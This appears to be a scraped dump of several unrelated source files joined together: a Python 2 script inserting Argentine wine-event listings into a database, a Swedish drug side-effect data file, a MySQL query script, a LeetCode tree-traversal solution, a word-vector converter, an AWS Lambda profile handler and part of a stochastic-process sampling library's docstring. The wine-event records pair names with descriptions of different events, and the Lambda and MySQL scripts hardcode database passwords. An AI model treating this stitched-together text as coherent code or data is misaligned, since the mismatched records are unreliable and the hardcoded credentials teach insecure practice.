Peugeot Lounge también se suma a esta tendencia con su food truck y presenta una propuesta de Crepería & Wine Bar: dos grandes tradiciones de la gastronomía francesa se unen en un mix perfecto y llegan a Vinos & Bodegas para que los visitantes disfruten al máximo esta experiencia.
Por su parte Vinómanos, la primera guía mobile en Latinoamérica de vinos argentinos, volverá a estar presente con su plataforma online, que permitirá a todos los visitantes obtener mayor información sobre los productos presentados por cada bodega.
Por segundo año consecutivo, FM One 103.7 musicalizará en vivo el evento, con todos los hits del momento. La experiencia se completa con exclusivos Dj’s Sets y distintas sesiones de live music.
Asimismo, en el marco del evento, La Rural y Bodegas de Argentina llevarán a cabo iniciativas de sustentabilidad. A través de “La Rural Recicla” y con la colaboración de las bodegas participantes, se recuperarán el cartón y las botellas de vidrio consumidas durante la exposición, que luego serán donados a la Cooperativa El Ceibo para su reciclado. También se impulsará el programa “Wine in Moderation”, que fomenta el consumo moderado y responsable, como la forma más inteligente de apreciar las virtudes y características de los grandes vinos que se presentarán. Además, los visitantes tendrán acceso permanente a estaciones de hidratación libre.
Vinos y Bodegas | Edición 2015
Organizadores: organiza Bodegas de Argentina y realiza La Rural, Predio Ferial de Buenos Aires.
Sede: La Rural, Predio Ferial de Buenos Aires, Pabellón Frers.
Ingresos: Av. Santa Fe 4363
Estacionamiento: Av. Sarmiento 2704 y Av. Cerviño 4476
Días: 24, 25 y 26 de septiembre
Horario: 18 a 23hs
Valor de la entrada: $200.-. (Incluye 12 copas de degustación)
Más información en: www.expovinosybodegas.com.ar"''', nombre = 'ROSARIO ALTA GAMA 2015',caracteristicas= ' Llega la segunda edición de Vinos de Argentina. El próximo 8 y 9 de mayo se realizará la Segunda Edición de Vinos de Argentina en Casa Las Cañitas (Huergo 283, CABA) de 18 a 23 hs. Esta feria vuelve a reunir en un espacio cálido y distendido a ...,', imagen = open('C:\\imagenes\\eventos\\thumb_51793_default_medium.jpeg','rb'))
db.evento.insert(
fecha=datetime.strptime('17/4/2015',fdate), direccion='Evento Global.', detalle='''
En esta 5ta. Edición del Malbec World Day se llevarán a cabo más de 70 eventos en 64 ciudades de 50 países del mundo para hacerle honor a la cepa insignia de la Argentina. En todos ellos se exhibirán tres cortometrajes seleccionados por WofA y creados para que sus espectadores puedan realizar una inmersión en la cultura argentina y específicamente en el Malbec, un morocho nacido en Francia que supo convertirse en el argentino más grande. Este año el evento tendrá como coprotagonista al cine, que al igual que el vino combina arte e industria a la vez. Hacer cine implica crear experiencias audiovisuales, contar historias, agudizar nuestra percepción del mundo e inventar atmósferas que estimulan nuestros sentidos. La cinematografía engloba diversas disciplinas: fotografía, literatura (guión), música, actuación y montaje. Es un proceso largo que incluye el trabajo de toda una industria. Su parte final, el montaje, implica una selección cuidadosa de los elementos de trabajo y la realización de una síntesis perfecta. Del mismo modo, nuestro vino Malbec es arte porque refleja nuestra manera de ser argentinos, simboliza nuestro carácter, nuestra pasión y nuestra relación férrea con la tierra, crea atmósferas íntimas que refuerzan vínculos, aportan calidez y confianza, alteran nuestra percepción sensorial; y es industria porque reúne las capacidades de nuestro capital humano y los avances tecnológicos para mejorar con el tiempo. Lights, Camera, Malbec es una feria dirigida a jóvenes de 25 a 35 años y su propuesta incluye degustar vinos Malbec de todos los estilos y terroirs, disfrutar de la oferta gastronómica de los food trucks, incorporar tips en mini charlas, bajar gratis la aplicación oficial del evento, disponible para iPhone y Android, en la que se encontrarán con todos los vinos pre-cargados, para que los asistentes puedan clickear "Me Gusta" y de esa manera tenerlos entre sus favoritos. El mismo formato de Lights, Camera, Malbec se replicará en New York, Estados Unidos; Lima, Perú; San Pablo, Brasil, el Distrito Federal de México; Bogotá, Colombia y Buenos Aires, Argentina. Asimismo, se desarrollarán campañas con los principales retailers de Reino Unido, Canadá, Brasil y México para promover las ventas. Todas las acciones tienen como objetivo proporcionar a los asistentes una experiencia de inmersión en la cultura y el espíritu de Argentina, en el cual el vino es una parte esencial. Asimismo, junto con el Ministerio de Relaciones Exteriores, Comercio Internacional y Culto de la Nación Argentina y los Gobiernos Provinciales, se llevarán a cabo eventos con periodistas, compradores e invitados especiales, que incluyen degustaciones, shows de tango, comidas, en más de 64 representaciones de 50 países alrededor del mundo. LIGHTS, CAMERA, MALBEC - CALENDARIO 2015 Buenos Aires 10 de Abril Bogotá 16 de abril Lima 17 de Abril Nueva York 17 de Abril Londres 17 de abril San Pablo 23 de Abril Manitoba 27 de abril México DF 30 de Abril Más información: <a href="http://www.malbecworldday.com/" target="_blank">www.malbecworldday.com <center><img src="/images/eventos/MalbecWorldDay20152.jpg"></center>
"''', nombre = 'VINOS DE ARGENTINA 2DA EDICIÓN',caracteristicas= ' Este año inaugura nueva sede sera en el resto bar La Reina (Cno. centenario y 511) los días jueves 7 y viernes 8 de mayo en el horario de 19 a 23 horas. ...,', imagen = open('C:\\imagenes\\eventos\\thumb_51902_default_medium.jpeg','rb'))
db.evento.insert(
fecha=datetime.strptime('10/4/2015',fdate), precio='A confirmar', direccion='Reservas al 1532930227 o al 155041-2721. Cupos Limitados.', detalle='''Mañana Viernes 10 de Abril estaremos participando en una de las Cenas Degustación de Mi Colección de Vinos. Sommelier : Augusto Zegarra.''', nombre = 'FERIA DE VINOS CITY BELL 5TA EDICIÓN',caracteristicas= ' En conmemoración a la quinta celebracion del día internacional del Malbec, en el mes de Abril del 2015 les propondremos ser parte de +Wine Edition #2 bajo el slogan: "WE LOVE MALBEC" en donde, como ya es costumbre, contaremos con dos sectores de de ...,', imagen = open('C:\\imagenes\\eventos\\thumb_51979_default_medium.jpeg','rb'))
db.evento.insert(
fecha=datetime.strptime('9/4/2015',fdate), precio='$150 efectivo', direccion='Reservas al 4775-4369', detalle='''
Esta noche te esperamos en Chenaut 1912 (Las Cañitas) para degustar la línea Primogénito. Para culminar habrá un tapeo especial, te lo vas a perder?"
''', nombre = 'WINE EDITION #2',caracteristicas= ' Te invitamos a festejar el MALBEC WORLD DAY. No te lo pierdas este Sábado 18 de Abril en el Club Italiano de la Ciudad de Neuquén. ...,', imagen = open('C:\\imagenes\\eventos\\thumb_52089_default_medium.jpeg','rb'))
db.evento.insert(
fecha=datetime.strptime('4/6/2015',fdate), fecha_fin=datetime.strptime('6/6/2015',fdate), direccion='Terrazas del Paraná, Estación Fluvial de Rosario.', detalle='''
Alta Gama Rosario vuelve del 4 al 6 de junio de 2015 para brindar por sus 11 años con un recorrido totalmente renovado en el ámbito de Terrazas del Paraná, en La Estación Fluvial de Rosario, presentando una gran cantidad de expositores. En 2015 Alta Gama Rosario se dedicará a presentar aquellos nuevos y grandes vinos de las distintas regiones de nuestro país. Todas las noches habrá un brindis muy especial con música en vivo, charlas y degustaciones privadas, y la presencia de personalidades del mundo del vino. Confirmaron su participación en Alta Gama 2015 las bodegas: Casa Bianchi - Bodegas López - Finca La Luz (Callejón del Crímen) - Gouguenheim - Finca Flichman - Cafayate (Etchart) - Vistalba - Casarena - Hess Family - Humberto Canale - Gimenez Riili - Familia Zuccardi - Puertas de los Andes, Nómade Wines - Jean Rivier - Dante Robino - Telteca - A16 (Auge Vinos) - Catena Zapata - Viña Las Perdices - Otaviano - Laureano Gómez - Angelado - Avarizza - El Equilibrista Wines - La Azul - Eduardo Vidal Wines - Fabricio Orlando Wines - La Rural - Chandon - Terrazas de los Andes - Domados Wines - Rutini Wines - CarinaE - Domingo Hnos. - Alto Uxmal - Fica Sophenia - Huarpe Wines - Joffré e Hijas - Casa Margot - Paiman - Los Cerrillos - Freixenet - Finca La Anita - Alfredo Roca - Finca Decero - Noemía - Aniello - Chacra - Fabre Montmayou - Flia. Schröeder - Kaikén - Vicentín Family Wines - Rosell Boher - Mosquita Muerta Wines - Bodega Raffy Junto a la gastronomía de: ISHyR / Alta Cocina, Paladini Quesos y sus selectos fiambres L'Abratto, Quesos Tregar, Aceites Zuccardi, Catena Institute of Wines, Río Helados, establecimientos La Cumbre, Frozen Bag y Aguas Waterin. El jueves 4 de junio Alta Gama Rosario 2015 comenzará con un horario dedicado especialmente a traders, un espacio de contacto directo entre las bodegas y los compradores del vino y la prensa especializada. Ese mismo día, a partir de las 19, el salón se abrirá al público en general y a las 20.30 se llevará a cabo la inauguración oficial con el gran descorche de apertura a cargo de los organizadores junto a las autoridades de nuestra ciudad. Para más información: www.rosarioaltagama.com info@rosarioaltagama.com Facebook: Alta Gama Rosario Twitter: @AltaGamaRosario "''', nombre = 'MALBEC WORLD DAY CON PATRITTI',caracteristicas= ' En esta 5ta. Edición del Malbec World Day se llevarán a cabo más de 70 eventos en 64 ciudades de 50 países del mundo para hacerle honor a la cepa insignia de la Argentina. En todos ellos se exhibirán tres cortometrajes seleccionados por WofA y c ...,', imagen = open('C:\\imagenes\\eventos\\thumb_52210_default_medium.jpeg','rb'))
db.evento.insert(
fecha=datetime.strptime('8/5/2015',fdate), fecha_fin=datetime.strptime('9/5/2015',fdate), precio='$150', direccion='Casa Las Cañitas - Huergo 283, CABA.', detalle='''
Llega la segunda edición de Vinos de Argentina. El próximo 8 y 9 de mayo se realizará la Segunda Edición de Vinos de Argentina en Casa Las Cañitas (Huergo 283, CABA) de 18 a 23 hs. Esta feria vuelve a reunir en un espacio cálido y distendido a las 14 provincias productoras de vinos en el país. Los invitados podrán degustar los diferentes varietales de Jujuy, Salta, Tucumán, Catamarca, La Rioja, San Juan, San Luis, Mendoza, Córdoba, Buenos Aires, La Pampa, Río Negro, Neuquén y Chubut. Además, las bodegas seleccionadas brindarán las claves de cada terruño en los que nacen sus vinos y darán a conocer sus más destacados productos. Tenemos un gran país productor, con tierra generosa, enólogos que apuestan a lo singular y una gran industria que se pone en movimiento detrás de cada copa. Vinos de Argentina se transforma en un paseo vitivinícola federal con vinos de altura, vinos patagónicos y vinos impensados. "''', nombre = 'MALBEC WORLD DAY 2015',caracteristicas= ' En la tercera edición, la gran fiesta del Día del Gourmet extiende su duración: comienza el sábado 11 abril y cierra el 14, la fecha de su celebración. Serán cuatro días gloriosos para disfrutar el placer de los aromas y sabores de la gastrono ...,', imagen = open('C:\\imagenes\\eventos\\thumb_52214_default_medium.jpeg','rb'))
db.evento.insert(
fecha=datetime.strptime('29/3/2015',fdate), precio='Gratis', direccion='El Dorrego: Zapiola 50 - Palermo. Ciudad de Buenos Aires', detalle='''
Este fin de semana nos vemos en Celebra Patagonia desde el mediodía en El Dorrego: Zapiola 50 (Palermo). Además de poder adquirir nuestros vinos y platos típicos de la región, podrás disfrutar de clases de cocina con Narda Lepes, Pablo Buzzo y <a href="https://www.facebook.com/PetersenRoberto">Roberto Petersen. También se presentará la Camerata Bariloche - Orquesta de Cámara Clásica y <a href="https://www.facebook.com/la.pipetua">La Pipetuá. Te esperamos!! "
''', nombre = 'DÍA DEL GOURMET 2015',caracteristicas= ' Mañana Viernes 10 de Abril estaremos participando en una de las Cenas Degustación de Mi Colección de Vinos. Sommelier : Augusto Zegarra. ...,', imagen = open('C:\\imagenes\\eventos\\thumb_52702_default_medium.jpeg','rb'))
db.evento.insert(
fecha=datetime.strptime('7/5/2015',fdate), fecha_fin=datetime.strptime('8/5/2015',fdate), precio='A confirmar', direccion='"https://www.facebook.com/feriadevinoscitybell', detalle='''
Este año inaugura nueva sede sera en el resto bar La Reina (Cno. centenario y 511) los días jueves 7 y viernes 8 de mayo en el horario de 19 a 23 horas.
''', nombre = 'CENA DEGUSTACIÓN EN MI COLECCIÓN DE VINOS - BODEGA PATRITTI',caracteristicas= ' Esta noche te esperamos en Chenaut 1912 (Las Cañitas) para degustar la línea Primogénito. Para culminar habrá un tapeo especial, te lo vas a perder? ...,', imagen = open('C:\\imagenes\\eventos\\thumb_52703_default_medium.jpeg','rb'))
db.evento.insert(
fecha=datetime.strptime('3/4/2015',fdate), direccion='Centro de Convenciones Arrayanes - Villa la Angostura.', detalle='''
Este viernes nos encontramos en Expo Vinos Angostura. Los esperamos de 12 a 23 hs en el Centro de Convenciones Arrayanes. ''', nombre = 'BODEGA PATRITTI EN VINOTECA 1912',caracteristicas= ' Este viernes nos encontramos en Expo Vinos Angostura. Los esperamos de 12 a 23 hs en el Centro de Convenciones Arrayanes. ...,', imagen = open('C:\\imagenes\\eventos\\thumb_52704_default_medium.jpeg','rb'))
except Exception as e:
print e
return True
| [
"villan.laura@gmail.com"
] | villan.laura@gmail.com |
c56498fc4dae80612f8baae4f506c36ed59b0171 | b39d9ef9175077ac6f03b66d97b073d85b6bc4d0 | /Benzylpenicillin_Panpharma_powder_for_solution_for_injection_or_infusion_SmPC.py | 69089c71ae727141e3d4f4acc96f228c2a5007ba | [] | no_license | urudaro/data-ue | 2d840fdce8ba7e759b5551cb3ee277d046464fe0 | 176c57533b66754ee05a96a7429c3e610188e4aa | refs/heads/master | 2021-01-22T12:02:16.931087 | 2013-07-16T14:05:41 | 2013-07-16T14:05:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 511 | py | {'_data': [['Uncommon',
[['General',
u'(>1/1 000 till Blodet och lymfsystemet: eosinofili < 1/100): Hud och subkutan v\xe4vnad: urtikaria']]],
['Rare',
[['General',
u'< 1/1 000): anafylaktiska reaktioner. Blodet och lymfsystemet: agranulocytos, hemolytisk anemi, leukopeni. Magtarmkanalen: diarr\xe9 orsakad av Clostridium difficile.']]],
['Unknown', [['General', u'tromboflebit']]]],
'_pages': [2, 3],
u'_rank': 3,
u'_type': u'LSFU'} | [
"daro@daro-ThinkPad-X220.(none)"
] | daro@daro-ThinkPad-X220.(none) |
c317a09ce75d6e4aef775c02a3fa0eaa148cf157 | c701cb59fc58bb01994ac1ec6caae54383f38606 | /sql.py | 99e1f75015f522ecafcc0ad5defcd728f650d534 | [] | no_license | ya0yue/CBIR-System-Based-on-OpenCV | fe9e1f9f98820477773012960d8f9746a8caae8e | e5b861cd8348ab753042d1dbc203bd5ab84f2b4f | refs/heads/master | 2021-01-01T17:53:45.168517 | 2017-07-24T12:43:15 | 2017-07-24T12:43:15 | 98,189,555 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 516 | py | # -*- coding: utf-8 -*-
"""
Created on Tue Jul 11 12:31:51 2017
@author: Mars
"""
import MySQLdb
# Open the database connection
db = MySQLdb.connect("localhost", "root", "root", "sys")
# Use the cursor() method to get an operation cursor
cursor = db.cursor()
# Use the execute() method to run the SQL statement
cursor.execute("SELECT * from sys.path_table")
# Use fetchone() to retrieve a single row
data = cursor.fetchone()
print(data)
#print("Database version : %s " % data)
# Close the database connection
db.close()
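# --- Illustrative extension (not part of the original script) ---------------
# To walk every row of path_table instead of only the first, fetchall() could
# be used before the connection is closed, e.g.:
#     cursor.execute("SELECT * from sys.path_table")
#     for row in cursor.fetchall():
#         print(row)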
| [
"ya0yue@163.com"
] | ya0yue@163.com |
c93dc563ea1949b6da100813fc21b5da41154c7b | a0ae54b00f273e7e896a13a82eae421306e04138 | /leetcode/BinaryTreeLevelOrderTraversal2.py | e3ec46113325eb64d51adf33f1835a4b8077ec99 | [] | no_license | kth496/Algorithm-study | afdcf3de47e66842af3b9d2c0273c66492020fae | 8911b07a19f20bf2011f44c4444c2817d162ea14 | refs/heads/master | 2023-02-16T19:32:50.315782 | 2023-02-07T15:11:16 | 2023-02-07T15:11:16 | 276,591,767 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 514 | py | class Solution:
def levelOrderBottom(self, root: TreeNode) -> List[List[int]]:
ret = []
q = deque()
q.append((root, 1))
if not root: return ret
while q:
cur, depth = q.popleft()
if not cur: continue
if len(ret) < depth:
level = []
ret.insert(0, level)
ret[-depth].append(cur.val)
q.append((cur.left, depth + 1))
q.append((cur.right, depth + 1))
return ret
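# --- Local usage sketch (not part of the original LeetCode submission) ------
# On LeetCode the judge supplies TreeNode, deque and List. To run this file
# standalone, `from collections import deque`, `from typing import List` and a
# TreeNode class would have to be defined above Solution, e.g.:
#
#     class TreeNode:
#         def __init__(self, val=0, left=None, right=None):
#             self.val = val
#             self.left = left
#             self.right = right
#
# Example: for the tree [3, 9, 20, null, null, 15, 7],
#     root = TreeNode(3, TreeNode(9), TreeNode(20, TreeNode(15), TreeNode(7)))
#     Solution().levelOrderBottom(root)  # -> [[15, 7], [9, 20], [3]]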
| [
"noreply@github.com"
] | kth496.noreply@github.com |
9d41aba287470cf0dce352ba68db49e18234b6bd | a55e2c2c7bfe67179b7ca39cd9f54e93fc786d21 | /src/mbot_sim/scripts/cmd.py | b1bac712296d0e06f3f8bcd3976cdf3b66f312f6 | [] | no_license | EcustBoy/multi-robot-formation-control | 356e89151e028a562765e9f4c2f7a1fb1b498219 | 04926454c2c8c78239d8efd479d0b6fa431b6d8f | refs/heads/master | 2022-09-30T14:46:52.158758 | 2020-06-02T18:58:25 | 2020-06-02T18:58:25 | 258,541,239 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,219 | py | import numpy as np
import math
import time
import rospy
import tf
import roslaunch
import rospkg
control_space=np.ones([1,2])
action=list()
t=0
def execute(action):
#action:[v,w]-linear/angular velocity
#rospy.wait_for_service('/gazebo/unpause_physics')
#try:
# self.unpause
#except rospy.ServiceException:
# print("/gazebo/unpause_physics service call failed")
rospy.init_node('env_node')
vel_pub_1 = rospy.Publisher('/mbot_1/cmd_vel', Twist, queue_size=5)
vel_pub_2 = rospy.Publisher('/mbot_2/cmd_vel', Twist, queue_size=5)
vel_cmd = Twist()
vel_cmd.linear.x=action['linear_vel']
vel_cmd.angular.z=action['angular_vel']
#vel=[vel_cmd.linear.x,vel_cmd.angular.z]
#print(vel)
vel_pub_1.publish(vel_cmd)
vel_pub_2.publish(vel_cmd)
time.sleep(0.05)
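# Main loop: build a time-varying (sinusoidal) velocity command and send it to both robots.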
while True:
t=t+1
#compute consensus-based control input
#control_space[i,:]=np.array([np.sin(state_space[i,0]),np.sin(state_space[i,2])])
control_space=np.array([np.sin(t),np.cos(t)])
action.append({'linear_vel':control_space[0],'angular_vel':control_space[1]})
    execute(action[-1])  # execute() expects a single command dict, not the whole action history list
"779110563@qq.com"
] | 779110563@qq.com |
b4c3ae34a31eea385f146470bef67da7346f2e2e | 7330e1db3b07af48400e842c6ddb544fec91315d | /prepare_vectors.py | 806c2173fde53b229ab0d4d3c320a86af0bfd075 | [
"Apache-2.0"
] | permissive | karthikncode/Gaussian_LDA | 3d60dcc4662146ec7dd8692eec4716a8116bb63d | b5c105ac0515be9faa9cd38968c66138bb64a385 | refs/heads/master | 2021-01-09T20:48:59.553044 | 2016-02-28T17:35:33 | 2016-02-28T17:35:33 | 52,541,528 | 4 | 2 | null | 2016-02-25T16:56:56 | 2016-02-25T16:56:56 | null | UTF-8 | Python | false | false | 687 | py | ''' File to convert word vectors to proper format '''
import sys
vectorFile = sys.argv[1]
vocabFile = sys.argv[2]
outFile = sys.argv[3]
dim = -1
f = open(vectorFile, 'r').read().lower().strip().split('\n')
vectors = {}
for line in f:
line = line.split()
vectors[line[0]] = [float(q) for q in line[1:]]
if dim == -1:
dim = len(line) - 1
vocab = open(vocabFile).read().lower().strip().split('\n')
#write the vectors in the same order as vocab
g = open(outFile, 'w')
zeroVector = [0.0] * dim
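# Vocabulary words missing from the vector file fall back to the all-zero vector.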
for w in vocab:
if w in vectors:
vec = vectors[w]
else:
vec = zeroVector
g.write(' '.join([str(q) for q in vec]) + '\n')
g.close()
| [
"nkartr@gmail.com"
] | nkartr@gmail.com |
3463fb1018d3a2f5a0efe5c5b1b8ac5c67ebed56 | c77376430190c0c4d6d6d3cd23376d693661ccee | /FyreEmblemCapstone/CloudSripts/profile_lambda.py | 48221e1d8ef67f45ee5c633976d88cfd8ab93aba | [] | no_license | JMOatey/CapstoneProject | 2833cd3493ca1dc32c1cbb1ba1ab03e0d1f98212 | b0f63d331501b69828cf37e6e32ad8f6eb03353d | refs/heads/master | 2020-07-09T03:34:37.271240 | 2019-12-08T20:38:40 | 2019-12-08T20:38:40 | 203,861,961 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,066 | py | import boto3
import json
import pymysql
database_host = "capstone.ce8exeo9ulmj.us-east-1.rds.amazonaws.com"
database_port = 3306
database_username = "admin"
database_password = "capstone"
database_name = "capstone"
dynamodb = boto3.resource('dynamodb')
def get_profile(username, database):
try:
with database.cursor() as cursor:
sql = "SELECT data FROM profile WHERE username=%s"
cursor.execute(sql, (username, ))
result = cursor.fetchone()
return result.get('data')
except Exception as e:
print(e)
return None
def update_profile(username, profile_data, database):
try:
with database.cursor() as cursor:
sql = "UPDATE profile SET data=%s WHERE username=%s"
cursor.execute(sql, (profile_data, username))
database.commit()
return f"{username}'s profile has been updated."
except Exception as e:
print(e)
return None
def lambda_handler(event, context):
# Connect to database
database = pymysql.connect(
database_host,
user=database_username,
passwd=database_password,
db=database_name,
connect_timeout=5,
cursorclass=pymysql.cursors.DictCursor)
# Handle event
http_method = event.get("httpMethod")
username = event.get("requestContext", {}).get("authorizer", {}).get("claims", {}).get("username")
if http_method == "GET":
response = get_profile(username, database)
elif http_method == "PUT":
event_body = json.loads(event.get("body", {}))
profile_data = event_body.get("profile")
response = update_profile(username, profile_data, database)
code = True if response else False
body = {
"message": response,
"code": code
}
return {
'statusCode': 200,
'body': json.dumps(body)
}
if __name__ == "__main__":
lambda_handler(None, None) | [
"nk529@mail.missouri.edu"
] | nk529@mail.missouri.edu |
f6850b22904eed88158470115b93e6288b882b8d | 266265e04ab06bdcf3d51580f9720e2f89ecab22 | /prob01.py | 20c8e1300d99cf3e8fa915de5c718cda4f0f628f | [] | no_license | gioung/practice01 | 259034a1c4067e912d55bec89af6344d9918f66f | b5dc26567d762206e0714357b24b4c27143cb52e | refs/heads/master | 2020-06-03T11:26:57.651111 | 2019-06-13T08:33:48 | 2019-06-13T08:33:48 | 191,549,634 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 341 | py | # 키보드로 정수 수치를 입력 받아 그것이 3의 배수인지 판단하세요
import sys
number = input('수를 입력하세요: ')
if number.isdigit():
if int(number) % 3 == 0:
print('3의 배수 입니다.')
else:
print('3의 배수가 아닙니다.')
sys.exit(0)
print('정수가 아닙니다')
| [
"ska2253@naver.com"
] | ska2253@naver.com |
fd12b1ed954f0caf245bb4e4ff2f723ef1241618 | 6423f45f0a90bd33fcc126cd6c664bb604496e1b | /app/category.py | 32c459def0568c1d3dce6c3ba0301e30a4a0e25d | [] | no_license | lemonh4733/aukcionasPython | e698fd8db968eebd53342e90c4633e161b9076a7 | ea67c1a1c6642c3940d35d87775ad38fefa7b3e2 | refs/heads/master | 2021-05-20T03:02:48.293167 | 2020-04-05T23:20:38 | 2020-04-05T23:20:38 | 252,158,257 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 152 | py | from app import db
class Category(db.Model):
id = db.Column(db.Integer, primary_key=True)
cat_name = db.Column(db.String(80), nullable=False)
| [
"simke95159@gmail.com"
] | simke95159@gmail.com |
813ed9d22c40ad0ebf512f0f48797ec447f7b234 | 00cb5907750926f1a9b0fde97301f10d01f49645 | /tf_quant_finance/models/euler_sampling.py | 27d3ed52099fd2850f5f9dd8d627110fafddc958 | [
"Apache-2.0",
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference",
"LicenseRef-scancode-generic-cla"
] | permissive | dannyb2018/tf-quant-finance | 63761e4a39b615da6a5258e48030d2b12a142b26 | 668b4fb0f91b1f60c9015cef087b3e879ee2a4f7 | refs/heads/master | 2023-07-07T20:00:59.529305 | 2021-08-18T13:05:11 | 2021-08-18T13:05:51 | 284,707,826 | 0 | 0 | Apache-2.0 | 2020-08-03T13:29:15 | 2020-08-03T13:29:14 | null | UTF-8 | Python | false | false | 22,684 | py | # Lint as: python3
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""The Euler sampling method for ito processes."""
from typing import Callable, List, Optional
import tensorflow.compat.v2 as tf
from tf_quant_finance import types
from tf_quant_finance import utils as tff_utils
from tf_quant_finance.math import custom_loops
from tf_quant_finance.math import random
from tf_quant_finance.models import utils
def sample(
dim: int,
drift_fn: Callable[..., types.RealTensor],
volatility_fn: Callable[..., types.RealTensor],
times: types.RealTensor,
time_step: Optional[types.RealTensor] = None,
num_time_steps: Optional[types.IntTensor] = None,
num_samples: types.IntTensor = 1,
initial_state: Optional[types.RealTensor] = None,
random_type: Optional[random.RandomType] = None,
seed: Optional[types.IntTensor] = None,
swap_memory: bool = True,
skip: types.IntTensor = 0,
precompute_normal_draws: bool = True,
times_grid: Optional[types.RealTensor] = None,
normal_draws: Optional[types.RealTensor] = None,
watch_params: Optional[List[types.RealTensor]] = None,
validate_args: bool = False,
tolerance: Optional[types.RealTensor] = None,
dtype: Optional[tf.DType] = None,
name: Optional[str] = None) -> types.RealTensor:
"""Returns a sample paths from the process using Euler method.
For an Ito process,
```
dX = a(t, X_t) dt + b(t, X_t) dW_t
X(t=0) = x0
```
with given drift `a` and volatility `b` functions Euler method generates a
sequence {X_n} as
```
X_{n+1} = X_n + a(t_n, X_n) dt + b(t_n, X_n) (N(0, t_{n+1}) - N(0, t_n)),
X_0 = x0
```
where `dt = t_{n+1} - t_n` and `N` is a sample from the Normal distribution.
See [1] for details.
#### Example
Sampling from 2-dimensional Ito process of the form:
```none
dX_1 = mu_1 * sqrt(t) dt + s11 * dW_1 + s12 * dW_2
dX_2 = mu_2 * sqrt(t) dt + s21 * dW_1 + s22 * dW_2
```
```python
import tensorflow as tf
import tf_quant_finance as tff
import numpy as np
mu = np.array([0.2, 0.7])
s = np.array([[0.3, 0.1], [0.1, 0.3]])
num_samples = 10000
dim = 2
dtype = tf.float64
# Define drift and volatility functions
def drift_fn(t, x):
return mu * tf.sqrt(t) * tf.ones([num_samples, dim], dtype=dtype)
def vol_fn(t, x):
return s * tf.ones([num_samples, dim, dim], dtype=dtype)
# Set starting location
x0 = np.array([0.1, -1.1])
# Sample `num_samples` paths at specified `times` using Euler scheme.
times = [0.1, 1.0, 2.0]
paths = tff.models.euler_sampling.sample(
dim=dim,
drift_fn=drift_fn,
volatility_fn=vol_fn,
times=times,
num_samples=num_samples,
initial_state=x0,
time_step=0.01,
seed=42,
dtype=dtype)
# Expected: paths.shape = [10000, 3, 2]
```
#### References
[1]: Wikipedia. Euler-Maruyama method:
https://en.wikipedia.org/wiki/Euler-Maruyama_method
Args:
dim: Python int greater than or equal to 1. The dimension of the Ito
Process.
drift_fn: A Python callable to compute the drift of the process. The
callable should accept two real `Tensor` arguments of the same dtype.
The first argument is the scalar time t, the second argument is the
value of Ito process X - tensor of shape
`batch_shape + [num_samples, dim]`. `batch_shape` is the shape of the
independent stochastic processes being modelled and is inferred from the
initial state `x0`.
The result is value of drift a(t, X). The return value of the callable
is a real `Tensor` of the same dtype as the input arguments and of shape
`batch_shape + [num_samples, dim]`.
volatility_fn: A Python callable to compute the volatility of the process.
The callable should accept two real `Tensor` arguments of the same dtype
and shape `times_shape`. The first argument is the scalar time t, the
second argument is the value of Ito process X - tensor of shape
`batch_shape + [num_samples, dim]`. The result is value of drift b(t, X).
The return value of the callable is a real `Tensor` of the same dtype as
the input arguments and of shape `batch_shape + [num_samples, dim, dim]`.
times: Rank 1 `Tensor` of increasing positive real values. The times at
which the path points are to be evaluated.
time_step: An optional scalar real `Tensor` - maximal distance between
points in grid in Euler schema.
Either this or `num_time_steps` should be supplied.
Default value: `None`.
    num_time_steps: An optional scalar integer `Tensor` - a total number of time
      steps performed by the algorithm. The maximal distance between points in
      the grid is bounded by `times[-1] / (num_time_steps - times.shape[0])`.
Either this or `time_step` should be supplied.
Default value: `None`.
num_samples: Positive scalar `int`. The number of paths to draw.
Default value: 1.
initial_state: `Tensor` of shape broadcastable with
`batch_shape + [num_samples, dim]`. The initial state of the process.
`batch_shape` represents the shape of the independent batches of the
stochastic process. Note that `batch_shape` is inferred from
the `initial_state` and hence when sampling is requested for a batch of
stochastic processes, the shape of `initial_state` should be at least
`batch_shape + [1, 1]`.
Default value: None which maps to a zero initial state.
random_type: Enum value of `RandomType`. The type of (quasi)-random
number generator to use to generate the paths.
Default value: None which maps to the standard pseudo-random numbers.
seed: Seed for the random number generator. The seed is
only relevant if `random_type` is one of
`[STATELESS, PSEUDO, HALTON_RANDOMIZED, PSEUDO_ANTITHETIC,
STATELESS_ANTITHETIC]`. For `PSEUDO`, `PSEUDO_ANTITHETIC` and
`HALTON_RANDOMIZED` the seed should be a Python integer. For
`STATELESS` and `STATELESS_ANTITHETIC `must be supplied as an integer
`Tensor` of shape `[2]`.
Default value: `None` which means no seed is set.
swap_memory: A Python bool. Whether GPU-CPU memory swap is enabled for this
op. See an equivalent flag in `tf.while_loop` documentation for more
details. Useful when computing a gradient of the op since `tf.while_loop`
      is used to propagate the stochastic process in time.
Default value: True.
skip: `int32` 0-d `Tensor`. The number of initial points of the Sobol or
Halton sequence to skip. Used only when `random_type` is 'SOBOL',
'HALTON', or 'HALTON_RANDOMIZED', otherwise ignored.
Default value: `0`.
precompute_normal_draws: Python bool. Indicates whether the noise increments
`N(0, t_{n+1}) - N(0, t_n)` are precomputed. For `HALTON` and `SOBOL`
random types the increments are always precomputed. While the resulting
graph consumes more memory, the performance gains might be significant.
Default value: `True`.
times_grid: An optional rank 1 `Tensor` representing time discretization
grid. If `times` are not on the grid, then the nearest points from the
grid are used. When supplied, `num_time_steps` and `time_step` are
ignored.
Default value: `None`, which means that times grid is computed using
`time_step` and `num_time_steps`.
normal_draws: A `Tensor` of shape broadcastable with
`batch_shape + [num_samples, num_time_points, dim]` and the same
